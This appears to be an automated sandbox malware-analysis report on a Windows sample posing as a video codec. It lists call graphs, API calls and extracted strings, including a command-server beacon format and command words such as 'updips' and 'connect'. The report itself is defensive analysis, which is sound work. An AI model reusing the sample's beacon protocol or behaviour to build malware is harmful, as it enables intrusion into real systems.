2bdb1ef 21483->21485 21484 2bdb245 21500 2be0e9e 21484->21500 21485->21484 21487 2bdb223 21485->21487 21490 2be0f24 __chsize_nolock 59 API calls 21485->21490 21487->21484 21488 2be0f24 __chsize_nolock 59 API calls 21487->21488 21491 2bdb22f CloseHandle 21488->21491 21493 2bdb21a 21490->21493 21491->21484 21494 2bdb23b GetLastError 21491->21494 21492 2bdb26f 21492->21480 21496 2be0f24 __chsize_nolock 59 API calls 21493->21496 21494->21484 21495 2bd5e1a __dosmaperr 59 API calls 21495->21492 21496->21487 21509 2be100d RtlLeaveCriticalSection 21497->21509 21499 2bdb1bf 21499->21471 21501 2be0f0a 21500->21501 21502 2be0eaa 21500->21502 21503 2bd5e3b __chsize_nolock 59 API calls 21501->21503 21502->21501 21508 2be0ed3 21502->21508 21504 2be0f0f 21503->21504 21505 2bd5e07 __chsize_nolock 59 API calls 21504->21505 21506 2bdb24d 21505->21506 21506->21492 21506->21495 21507 2be0ef5 SetStdHandle 21507->21506 21508->21506 21508->21507 21509->21499 21510 2c2f515 21511 2c32987 ReadFile 21510->21511 21918 2bc648b RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 21919 2bc64f3 GetTickCount 21918->21919 21996 2bc42c7 21918->21996 21997 2bc605a 21919->21997 21998 2bd2f8c _malloc 59 API calls 21997->21998 21999 2bc606d 21998->21999 21513 402858 OpenSCManagerA 21514 402199 lstrcmpiW 21515 402323 21514->21515 21516 40d761 lstrcmpiW 21515->21516 21517 402170 21515->21517 21516->21517 21518 40d9c9 21517->21518 21519 40d159 StartServiceCtrlDispatcherA 21517->21519 21519->21517 22000 4026ba 22001 4026bf VirtualAlloc 22000->22001 22003 40d8a7 22001->22003 22004 2bfe004 22007 2bcf879 CreateFileA 22004->22007 22008 2bcf975 22007->22008 22011 2bcf8aa 22007->22011 22009 2bcf8c2 DeviceIoControl 22009->22011 22010 2bcf96b CloseHandle 22010->22008 22011->22009 22011->22010 22012 2bcf937 GetLastError 22011->22012 22013 2bd3b2c _Allocate 60 API calls 22011->22013 22012->22010 22012->22011 22013->22011 21520 40d19e 21521 40d52a RegCreateKeyExA 21520->21521 21522 40d538 21521->21522 21523 40279f GetCommandLineW 21524 402895 CommandLineToArgvW 21523->21524 21525 40d9fe GetLocalTime 21524->21525 21528 401f27 21525->21528 21529 401f3c 21528->21529 21532 401a1d 21529->21532 21531 401f45 21533 401a2c 21532->21533 21538 401a4f CreateFileA 21533->21538 21537 401a3e 21537->21531 21539 401a35 21538->21539 21544 401a7d 21538->21544 21546 401b4b LoadLibraryA 21539->21546 21540 401a98 DeviceIoControl 21540->21544 21542 401b3a CloseHandle 21542->21539 21543 401b0e GetLastError 21543->21542 21543->21544 21544->21540 21544->21542 21544->21543 21555 402ca6 21544->21555 21558 402c98 21544->21558 21547 401c21 21546->21547 21548 401b6e GetProcAddress 21546->21548 21547->21537 21549 401c18 FreeLibrary 21548->21549 21553 401b85 21548->21553 21549->21547 21550 401b95 GetAdaptersInfo 21550->21553 21551 402ca6 7 API calls 21551->21553 21552 401c15 21552->21549 21553->21550 21553->21551 21553->21552 21554 402c98 12 API calls 21553->21554 21554->21553 21561 4030a1 21555->21561 21591 403001 21558->21591 21562 4030ad 21561->21562 21570 402caf 21561->21570 21563 4030b7 21562->21563 21567 4030cd 21562->21567 21565 4030f9 HeapFree 21563->21565 21566 4030c3 21563->21566 21564 4030f8 21564->21565 21565->21570 21572 40443e 21566->21572 21567->21564 21569 4030e7 21567->21569 21578 404ecf 21569->21578 21570->21544 21573 40447c 21572->21573 21577 404732 21572->21577 21574 404678 VirtualFree 21573->21574 21573->21577 21575 4046dc 21574->21575 21576 4046eb VirtualFree HeapFree 21575->21576 21575->21577 21576->21577 21577->21570 21579 404f12 21578->21579 21580 404efc 21578->21580 21579->21570 21580->21579 21582 404db6 21580->21582 21585 404dc3 21582->21585 21583 404e73 21583->21579 21584 404de4 VirtualFree 21584->21585 21585->21583 21585->21584 21587 404d60 VirtualFree 21585->21587 21588 404d7d 21587->21588 21589 404dad 21588->21589 21590 404d8d HeapFree 21588->21590 21589->21585 21590->21585 21592 402ca3 21591->21592 21594 403008 21591->21594 21592->21544 21594->21592 21595 40302d 21594->21595 21596 40303c 21595->21596 21601 403051 21595->21601 21603 40304a 21596->21603 21604 404767 21596->21604 21598 403090 HeapAlloc 21599 40309f 21598->21599 21599->21594 21600 40304f 21600->21594 21601->21598 21601->21603 21610 404f14 21601->21610 21603->21598 21603->21599 21603->21600 21605 404799 21604->21605 21606 404838 21605->21606 21609 404847 21605->21609 21617 404a70 21605->21617 21606->21609 21624 404b21 21606->21624 21609->21603 21611 404f22 21610->21611 21612 40500e VirtualAlloc 21611->21612 21613 4050e3 21611->21613 21616 404fdf 21611->21616 21612->21616 21628 404c1c 21613->21628 21616->21603 21618 404ab3 HeapAlloc 21617->21618 21619 404a83 HeapReAlloc 21617->21619 21621 404b03 21618->21621 21622 404ad9 VirtualAlloc 21618->21622 21620 404aa2 21619->21620 21619->21621 21620->21618 21621->21606 21622->21621 21623 404af3 HeapFree 21622->21623 21623->21621 21625 404b33 VirtualAlloc 21624->21625 21627 404b7c 21625->21627 21627->21609 21629 404c30 HeapAlloc 21628->21629 21630 404c29 21628->21630 21631 404c4d VirtualAlloc 21629->21631 21636 404c85 21629->21636 21630->21631 21632 404d42 21631->21632 21633 404c6d VirtualAlloc 21631->21633 21634 404d4a HeapFree 21632->21634 21632->21636 21635 404d34 VirtualFree 21633->21635 21633->21636 21634->21636 21635->21632 21636->21616

                                                                                                      Executed Functions

                                                                                                      Function 02BC72AB Relevance: 95.2, APIs: 41, Strings: 13, Instructions: 659networksleepfileCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 2bc72ab-2bc72c3 InternetOpenA 1 2bc7389-2bc738f 0->1 2 2bc72c9-2bc731d InternetSetOptionA * 3 call 2bd4ad0 0->2 4 2bc73ab-2bc73b9 1->4 5 2bc7391-2bc7397 1->5 8 2bc7322-2bc7340 InternetOpenUrlA 2->8 6 2bc73bf-2bc73e3 call 2bd4ad0 call 2bc439c 4->6 7 2bc66f4-2bc66f6 4->7 9 2bc739d-2bc73aa call 2bc53ec 5->9 10 2bc7399-2bc739b 5->10 6->7 31 2bc73e9-2bc7417 RtlEnterCriticalSection RtlLeaveCriticalSection call 2bd231c 6->31 12 2bc66ff-2bc6701 7->12 13 2bc66f8-2bc66fd 7->13 14 2bc7382-2bc7383 InternetCloseHandle 8->14 15 2bc7342 8->15 9->4 10->4 21 2bc670e-2bc6742 RtlEnterCriticalSection RtlLeaveCriticalSection 12->21 22 2bc6703 12->22 19 2bc6708 Sleep 13->19 14->1 20 2bc7346-2bc736c InternetReadFile 15->20 19->21 24 2bc736e-2bc7375 20->24 25 2bc7377-2bc737e InternetCloseHandle 20->25 26 2bc6744-2bc6750 21->26 27 2bc6792 21->27 22->19 24->20 25->14 26->27 30 2bc6752-2bc675f 26->30 28 2bc6796 27->28 28->0 32 2bc6767-2bc6768 30->32 33 2bc6761-2bc6765 30->33 38 2bc746d-2bc7488 call 2bd231c 31->38 39 2bc7419-2bc742b call 2bd231c 31->39 34 2bc676c-2bc6790 call 2bd4ad0 * 2 32->34 33->34 34->28 47 2bc748e-2bc7490 38->47 48 2bc7742-2bc7754 call 2bd231c 38->48 39->38 49 2bc742d-2bc743f call 2bd231c 39->49 47->48 50 2bc7496-2bc7548 call 2bd2f8c RtlEnterCriticalSection RtlLeaveCriticalSection call 2bd4ad0 * 5 call 2bc439c * 2 47->50 58 2bc779d-2bc77a6 call 2bd231c 48->58 59 2bc7756-2bc7758 48->59 49->38 56 2bc7441-2bc7453 call 2bd231c 49->56 115 2bc754a-2bc754c 50->115 116 2bc7585 50->116 56->38 68 2bc7455-2bc7467 call 2bd231c 56->68 65 2bc77ab-2bc77af 58->65 59->58 63 2bc775a-2bc7798 call 2bd4ad0 RtlEnterCriticalSection RtlLeaveCriticalSection 59->63 63->7 69 2bc77d0-2bc77e2 call 2bd231c 65->69 70 2bc77b1-2bc77bf call 2bc61f5 call 2bc6303 65->70 68->7 68->38 83 2bc77e8-2bc77ea 69->83 84 2bc7b00-2bc7b12 call 2bd231c 69->84 86 2bc77c4-2bc77cb call 2bc640e 70->86 83->84 88 2bc77f0-2bc7807 call 2bc439c 83->88 84->7 96 2bc7b18-2bc7b46 call 2bd2f8c call 2bd4ad0 call 2bc439c 84->96 86->7 88->7 97 2bc780d-2bc78db call 2bd23f8 call 2bc1ba7 88->97 117 2bc7b4f-2bc7b56 call 2bd2f54 96->117 118 2bc7b48-2bc7b4a call 2bc534d 96->118 113 2bc78dd call 2bc143f 97->113 114 2bc78e2-2bc7903 RtlEnterCriticalSection 97->114 113->114 121 2bc790f-2bc7945 RtlLeaveCriticalSection call 2bc3c67 call 2bc3d7e 114->121 122 2bc7905-2bc790c 114->122 115->116 123 2bc754e-2bc7560 call 2bd231c 115->123 119 2bc7589-2bc75b7 call 2bd2f8c call 2bd4ad0 call 2bc439c 116->119 117->7 118->117 146 2bc75f8-2bc7601 call 2bd2f54 119->146 147 2bc75b9-2bc75c8 call 2bd35c6 119->147 138 2bc794a-2bc7967 call 2bc8311 121->138 122->121 123->116 135 2bc7562-2bc7583 call 2bc439c 123->135 135->119 142 2bc796c-2bc7973 138->142 144 2bc7979-2bc79b3 call 2bca6fb 142->144 145 2bc7ae7-2bc7afb call 2bc8fd9 142->145 152 2bc79b8-2bc79c1 144->152 145->7 158 2bc7738-2bc773b 146->158 159 2bc7607-2bc761f call 2bd3b2c 146->159 147->146 160 2bc75ca 147->160 156 2bc79c7-2bc79ce 152->156 157 2bc7ab1-2bc7ae2 call 2bc83c0 call 2bc33b2 152->157 162 2bc79d1-2bc79d6 156->162 157->145 158->48 172 2bc762b 159->172 173 2bc7621-2bc7629 call 2bc970d 159->173 164 2bc75cf-2bc75e1 call 2bd2830 160->164 162->162 166 2bc79d8-2bc7a15 call 2bca6fb 162->166 174 2bc75e6-2bc75f6 call 2bd35c6 164->174 175 2bc75e3 164->175 176 2bc7a1a-2bc7a23 166->176 178 2bc762d-2bc7661 call 2bca825 call 2bc3863 172->178 173->178 174->146 174->164 175->174 176->157 181 2bc7a29-2bc7a2f 176->181 188 2bc7666-2bc7682 call 2bc5119 178->188 185 2bc7a32-2bc7a37 181->185 185->185 187 2bc7a39-2bc7a74 call 2bca6fb 185->187 187->157 193 2bc7a76-2bc7aaa call 2bcd0ed 187->193 192 2bc7687-2bc76b8 call 2bc3863 call 2bcaacb 188->192 199 2bc76bd-2bc76cf call 2bcabe5 192->199 196 2bc7aaf-2bc7ab0 193->196 196->157 201 2bc76d4-2bc76e5 199->201 202 2bc76ec-2bc76fb Sleep 201->202 203 2bc76e7 call 2bc380b 201->203 205 2bc7703-2bc7717 call 2bd18d0 202->205 203->202 207 2bc7719-2bc7722 call 2bc4100 205->207 208 2bc7723-2bc7731 205->208 207->208 208->158 210 2bc7733 call 2bc380b 208->210 210->158
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(0000EA60), ref: 02BC6708
                                                                                                      • RtlEnterCriticalSection.NTDLL(02BF71E0), ref: 02BC6713
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02BF71E0), ref: 02BC6724
                                                                                                      • _memset.LIBCMT ref: 02BC6779
                                                                                                      • _memset.LIBCMT ref: 02BC6788
                                                                                                      • InternetOpenA.WININET(?), ref: 02BC72B5
                                                                                                      • InternetSetOptionA.WININET(00000000,00000002,?), ref: 02BC72DD
                                                                                                      • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02BC72F5
                                                                                                      • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02BC730D
                                                                                                      • _memset.LIBCMT ref: 02BC731D
                                                                                                      • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200), ref: 02BC7336
                                                                                                      • InternetReadFile.WININET(00000000,?,00001000,?), ref: 02BC7358
                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 02BC7378
                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 02BC7383
                                                                                                      • _memset.LIBCMT ref: 02BC73CB
                                                                                                      • RtlEnterCriticalSection.NTDLL(02BF71E0), ref: 02BC73EE
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02BF71E0), ref: 02BC73FF
                                                                                                      • _malloc.LIBCMT ref: 02BC7498
                                                                                                      • RtlEnterCriticalSection.NTDLL(02BF71E0), ref: 02BC74AA
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02BF71E0), ref: 02BC74B6
                                                                                                      • _memset.LIBCMT ref: 02BC74D0
                                                                                                      • _memset.LIBCMT ref: 02BC74DF
                                                                                                      • _memset.LIBCMT ref: 02BC74EF
                                                                                                      • _memset.LIBCMT ref: 02BC7502
                                                                                                      • _memset.LIBCMT ref: 02BC7518
                                                                                                      • _malloc.LIBCMT ref: 02BC758E
                                                                                                      • _memset.LIBCMT ref: 02BC759F
                                                                                                      • _strtok.LIBCMT ref: 02BC75BF
                                                                                                      • _swscanf.LIBCMT ref: 02BC75D6
                                                                                                      • _strtok.LIBCMT ref: 02BC75ED
                                                                                                      • _free.LIBCMT ref: 02BC75F9
                                                                                                      • Sleep.KERNEL32(000007D0), ref: 02BC76F1
                                                                                                      • _memset.LIBCMT ref: 02BC7765
                                                                                                      • RtlEnterCriticalSection.NTDLL(02BF71E0), ref: 02BC7772
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02BF71E0), ref: 02BC7784
                                                                                                      • _sprintf.LIBCMT ref: 02BC7822
                                                                                                      • RtlEnterCriticalSection.NTDLL(00000020), ref: 02BC78E6
                                                                                                      • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02BC791A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _memset$CriticalSection$Internet$EnterLeave$Option$CloseHandleOpenSleep_malloc_strtok$FileRead_free_sprintf_swscanf
                                                                                                      • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls$urls
                                                                                                      • API String ID: 696907137-1839899575
                                                                                                      • Opcode ID: 2d27b03a93e7b4ab114be8047b231d55629b1b943bee7fe0ead52fce45f56d15
                                                                                                      • Instruction ID: 3b7e9d39b7e8cf01733a8db744d7fad7a0d187c51cd9902b06efd7051fcfef11
                                                                                                      • Opcode Fuzzy Hash: 2d27b03a93e7b4ab114be8047b231d55629b1b943bee7fe0ead52fce45f56d15
                                                                                                      • Instruction Fuzzy Hash: 8A3210315483819FE724AB24D804BABBBEAEFD5314F2448ADF58A87291EB709504CF53
                                                                                                      Function 02BC648B Relevance: 82.5, APIs: 42, Strings: 5, Instructions: 228memorysleeplibraryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 481 2bc648b-2bc64ec RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 482 2bc64f3-2bc66f1 GetTickCount call 2bc605a GetVersionExA call 2bd4ad0 call 2bd2f8c * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2bd4ad0 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2bd2f8c * 4 QueryPerformanceCounter Sleep call 2bd2f8c * 2 call 2bd4ad0 * 2 481->482 483 2bc64ee call 2bc42c7 481->483 526 2bc66f4-2bc66f6 482->526 483->482 527 2bc66ff-2bc6701 526->527 528 2bc66f8-2bc66fd 526->528 530 2bc670e-2bc6742 RtlEnterCriticalSection RtlLeaveCriticalSection 527->530 531 2bc6703 527->531 529 2bc6708 Sleep 528->529 529->530 532 2bc6744-2bc6750 530->532 533 2bc6792 530->533 531->529 532->533 535 2bc6752-2bc675f 532->535 534 2bc6796-2bc72c3 InternetOpenA 533->534 540 2bc7389-2bc738f 534->540 541 2bc72c9-2bc7340 InternetSetOptionA * 3 call 2bd4ad0 InternetOpenUrlA 534->541 537 2bc6767-2bc6768 535->537 538 2bc6761-2bc6765 535->538 539 2bc676c-2bc6790 call 2bd4ad0 * 2 537->539 538->539 539->534 543 2bc73ab-2bc73b9 540->543 544 2bc7391-2bc7397 540->544 552 2bc7382-2bc7383 InternetCloseHandle 541->552 553 2bc7342 541->553 543->526 546 2bc73bf-2bc73e3 call 2bd4ad0 call 2bc439c 543->546 548 2bc739d-2bc73aa call 2bc53ec 544->548 549 2bc7399-2bc739b 544->549 546->526 564 2bc73e9-2bc7417 RtlEnterCriticalSection RtlLeaveCriticalSection call 2bd231c 546->564 548->543 549->543 552->540 559 2bc7346-2bc736c InternetReadFile 553->559 561 2bc736e-2bc7375 559->561 562 2bc7377-2bc737e InternetCloseHandle 559->562 561->559 562->552 567 2bc746d-2bc7488 call 2bd231c 564->567 568 2bc7419-2bc742b call 2bd231c 564->568 573 2bc748e-2bc7490 567->573 574 2bc7742-2bc7754 call 2bd231c 567->574 568->567 575 2bc742d-2bc743f call 2bd231c 568->575 573->574 576 2bc7496-2bc7548 call 2bd2f8c RtlEnterCriticalSection RtlLeaveCriticalSection call 2bd4ad0 * 5 call 2bc439c * 2 573->576 584 2bc779d-2bc77af call 2bd231c 574->584 585 2bc7756-2bc7758 574->585 575->567 582 2bc7441-2bc7453 call 2bd231c 575->582 641 2bc754a-2bc754c 576->641 642 2bc7585 576->642 582->567 594 2bc7455-2bc7467 call 2bd231c 582->594 595 2bc77d0-2bc77e2 call 2bd231c 584->595 596 2bc77b1-2bc77bf call 2bc61f5 call 2bc6303 584->596 585->584 589 2bc775a-2bc7798 call 2bd4ad0 RtlEnterCriticalSection RtlLeaveCriticalSection 585->589 589->526 594->526 594->567 609 2bc77e8-2bc77ea 595->609 610 2bc7b00-2bc7b12 call 2bd231c 595->610 612 2bc77c4-2bc77cb call 2bc640e 596->612 609->610 614 2bc77f0-2bc7807 call 2bc439c 609->614 610->526 622 2bc7b18-2bc7b46 call 2bd2f8c call 2bd4ad0 call 2bc439c 610->622 612->526 614->526 623 2bc780d-2bc78db call 2bd23f8 call 2bc1ba7 614->623 643 2bc7b4f-2bc7b56 call 2bd2f54 622->643 644 2bc7b48-2bc7b4a call 2bc534d 622->644 639 2bc78dd call 2bc143f 623->639 640 2bc78e2-2bc7903 RtlEnterCriticalSection 623->640 639->640 647 2bc790f-2bc7973 RtlLeaveCriticalSection call 2bc3c67 call 2bc3d7e call 2bc8311 640->647 648 2bc7905-2bc790c 640->648 641->642 649 2bc754e-2bc7560 call 2bd231c 641->649 645 2bc7589-2bc75b7 call 2bd2f8c call 2bd4ad0 call 2bc439c 642->645 643->526 644->643 672 2bc75f8-2bc7601 call 2bd2f54 645->672 673 2bc75b9-2bc75c8 call 2bd35c6 645->673 670 2bc7979-2bc79c1 call 2bca6fb 647->670 671 2bc7ae7-2bc7afb call 2bc8fd9 647->671 648->647 649->642 661 2bc7562-2bc7583 call 2bc439c 649->661 661->645 682 2bc79c7-2bc79ce 670->682 683 2bc7ab1-2bc7ae2 call 2bc83c0 call 2bc33b2 670->683 671->526 684 2bc7738-2bc773b 672->684 685 2bc7607-2bc761f call 2bd3b2c 672->685 673->672 686 2bc75ca 673->686 688 2bc79d1-2bc79d6 682->688 683->671 684->574 698 2bc762b 685->698 699 2bc7621-2bc7629 call 2bc970d 685->699 690 2bc75cf-2bc75e1 call 2bd2830 686->690 688->688 692 2bc79d8-2bc7a23 call 2bca6fb 688->692 700 2bc75e6-2bc75f6 call 2bd35c6 690->700 701 2bc75e3 690->701 692->683 707 2bc7a29-2bc7a2f 692->707 704 2bc762d-2bc76cf call 2bca825 call 2bc3863 call 2bc5119 call 2bc3863 call 2bcaacb call 2bcabe5 698->704 699->704 700->672 700->690 701->700 727 2bc76d4-2bc76e5 704->727 711 2bc7a32-2bc7a37 707->711 711->711 713 2bc7a39-2bc7a74 call 2bca6fb 711->713 713->683 719 2bc7a76-2bc7aaa call 2bcd0ed 713->719 722 2bc7aaf-2bc7ab0 719->722 722->683 728 2bc76ec-2bc7717 Sleep call 2bd18d0 727->728 729 2bc76e7 call 2bc380b 727->729 733 2bc7719-2bc7722 call 2bc4100 728->733 734 2bc7723-2bc7731 728->734 729->728 733->734 734->684 736 2bc7733 call 2bc380b 734->736 736->684
                                                                                                      APIs
                                                                                                      • RtlInitializeCriticalSection.NTDLL(02BF71E0), ref: 02BC64BA
                                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02BC64D1
                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 02BC64DA
                                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02BC64E9
                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 02BC64EC
                                                                                                      • GetTickCount.KERNEL32 ref: 02BC64F8
                                                                                                        • Part of subcall function 02BC605A: _malloc.LIBCMT ref: 02BC6068
                                                                                                      • GetVersionExA.KERNEL32(02BF7038), ref: 02BC6525
                                                                                                      • _memset.LIBCMT ref: 02BC6544
                                                                                                      • _malloc.LIBCMT ref: 02BC6551
                                                                                                        • Part of subcall function 02BD2F8C: __FF_MSGBANNER.LIBCMT ref: 02BD2FA3
                                                                                                        • Part of subcall function 02BD2F8C: __NMSG_WRITE.LIBCMT ref: 02BD2FAA
                                                                                                        • Part of subcall function 02BD2F8C: RtlAllocateHeap.NTDLL(007C0000,00000000,00000001), ref: 02BD2FCF
                                                                                                      • _malloc.LIBCMT ref: 02BC6561
                                                                                                      • _malloc.LIBCMT ref: 02BC656C
                                                                                                      • _malloc.LIBCMT ref: 02BC6577
                                                                                                      • _malloc.LIBCMT ref: 02BC6582
                                                                                                      • _malloc.LIBCMT ref: 02BC658D
                                                                                                      • _malloc.LIBCMT ref: 02BC6598
                                                                                                      • _malloc.LIBCMT ref: 02BC65A7
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02BC65BE
                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02BC65C7
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02BC65D6
                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02BC65D9
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02BC65E4
                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02BC65E7
                                                                                                      • _memset.LIBCMT ref: 02BC65FA
                                                                                                      • _memset.LIBCMT ref: 02BC6606
                                                                                                      • _memset.LIBCMT ref: 02BC6613
                                                                                                      • RtlEnterCriticalSection.NTDLL(02BF71E0), ref: 02BC6621
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02BF71E0), ref: 02BC662E
                                                                                                      • _malloc.LIBCMT ref: 02BC6652
                                                                                                      • _malloc.LIBCMT ref: 02BC6660
                                                                                                      • _malloc.LIBCMT ref: 02BC6667
                                                                                                      • _malloc.LIBCMT ref: 02BC668D
                                                                                                      • QueryPerformanceCounter.KERNEL32(00000200), ref: 02BC66A0
                                                                                                      • Sleep.KERNELBASE ref: 02BC66AE
                                                                                                      • _malloc.LIBCMT ref: 02BC66BA
                                                                                                      • _malloc.LIBCMT ref: 02BC66C7
                                                                                                      • _memset.LIBCMT ref: 02BC66DC
                                                                                                      • _memset.LIBCMT ref: 02BC66EC
                                                                                                      • Sleep.KERNELBASE(0000EA60), ref: 02BC6708
                                                                                                      • RtlEnterCriticalSection.NTDLL(02BF71E0), ref: 02BC6713
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02BF71E0), ref: 02BC6724
                                                                                                      • _memset.LIBCMT ref: 02BC6779
                                                                                                      • _memset.LIBCMT ref: 02BC6788
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _malloc$_memset$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                                                      • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                                                                      • API String ID: 2251652938-2678694477
                                                                                                      • Opcode ID: 9cb803cb778f7f4de2c269beef88c2996a02dde96f52c70be6ad3ba8291c4939
                                                                                                      • Instruction ID: 4b7b005d88279883161126a7737e94223e8633d8993c9d93be0fd0e5c3cd2134
                                                                                                      • Opcode Fuzzy Hash: 9cb803cb778f7f4de2c269beef88c2996a02dde96f52c70be6ad3ba8291c4939
                                                                                                      • Instruction Fuzzy Hash: 5171A4B1D483509FE7106F309C45B5BFBE9AF85350F100CAEF9859B281EBB49850DBA6
                                                                                                      Function 00401B4B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74libraryloaderCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1250 401b4b-401b68 LoadLibraryA 1251 401c21-401c25 1250->1251 1252 401b6e-401b7f GetProcAddress 1250->1252 1253 401b85-401b8e 1252->1253 1254 401c18-401c1b FreeLibrary 1252->1254 1255 401b95-401ba5 GetAdaptersInfo 1253->1255 1254->1251 1256 401ba7-401bb0 1255->1256 1257 401bdb-401be3 1255->1257 1260 401bc1-401bd7 call 402cc0 call 4018cc 1256->1260 1261 401bb2-401bb6 1256->1261 1258 401be5-401beb call 402ca6 1257->1258 1259 401bec-401bf0 1257->1259 1258->1259 1264 401bf2-401bf6 1259->1264 1265 401c15-401c17 1259->1265 1260->1257 1261->1257 1266 401bb8-401bbf 1261->1266 1264->1265 1269 401bf8-401bfb 1264->1269 1265->1254 1266->1260 1266->1261 1271 401c06-401c13 call 402c98 1269->1271 1272 401bfd-401c03 1269->1272 1271->1255 1271->1265 1272->1271
                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B5D
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                                                                      • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                                                                      • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                                      • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                                                      • API String ID: 514930453-3667123677
                                                                                                      • Opcode ID: b984b7dde6bf878e61bd9d6389ae28c16a21e2d2acce5cac07de2378b9438879
                                                                                                      • Instruction ID: 38440359ad4724572ca0372a4bc8090c683b298b5ffde01d95b1867a6a9b844d
                                                                                                      • Opcode Fuzzy Hash: b984b7dde6bf878e61bd9d6389ae28c16a21e2d2acce5cac07de2378b9438879
                                                                                                      • Instruction Fuzzy Hash: F921B870904109AFEF119F65C9447EF7BB8EF41344F1440BAD504B22E1E7789985CB69
                                                                                                      Function 02BCF97D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 87libraryloaderCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1324 2bcf97d-2bcf9a0 LoadLibraryA 1325 2bcf9a6-2bcf9b4 GetProcAddress 1324->1325 1326 2bcfa60-2bcfa67 1324->1326 1327 2bcfa59-2bcfa5a FreeLibrary 1325->1327 1328 2bcf9ba-2bcf9ca 1325->1328 1327->1326 1329 2bcf9cc-2bcf9d8 GetAdaptersInfo 1328->1329 1330 2bcf9da 1329->1330 1331 2bcfa10-2bcfa18 1329->1331 1334 2bcf9dc-2bcf9e3 1330->1334 1332 2bcfa1a-2bcfa20 call 2bd3788 1331->1332 1333 2bcfa21-2bcfa26 1331->1333 1332->1333 1336 2bcfa28-2bcfa2b 1333->1336 1337 2bcfa54-2bcfa58 1333->1337 1338 2bcf9ed-2bcf9f5 1334->1338 1339 2bcf9e5-2bcf9e9 1334->1339 1336->1337 1341 2bcfa2d-2bcfa32 1336->1341 1337->1327 1343 2bcf9f8-2bcf9fd 1338->1343 1339->1334 1342 2bcf9eb 1339->1342 1344 2bcfa3f-2bcfa4a call 2bd3b2c 1341->1344 1345 2bcfa34-2bcfa3c 1341->1345 1342->1331 1343->1343 1346 2bcf9ff-2bcfa0c call 2bcf6cc 1343->1346 1344->1337 1351 2bcfa4c-2bcfa4f 1344->1351 1345->1344 1346->1331 1351->1329
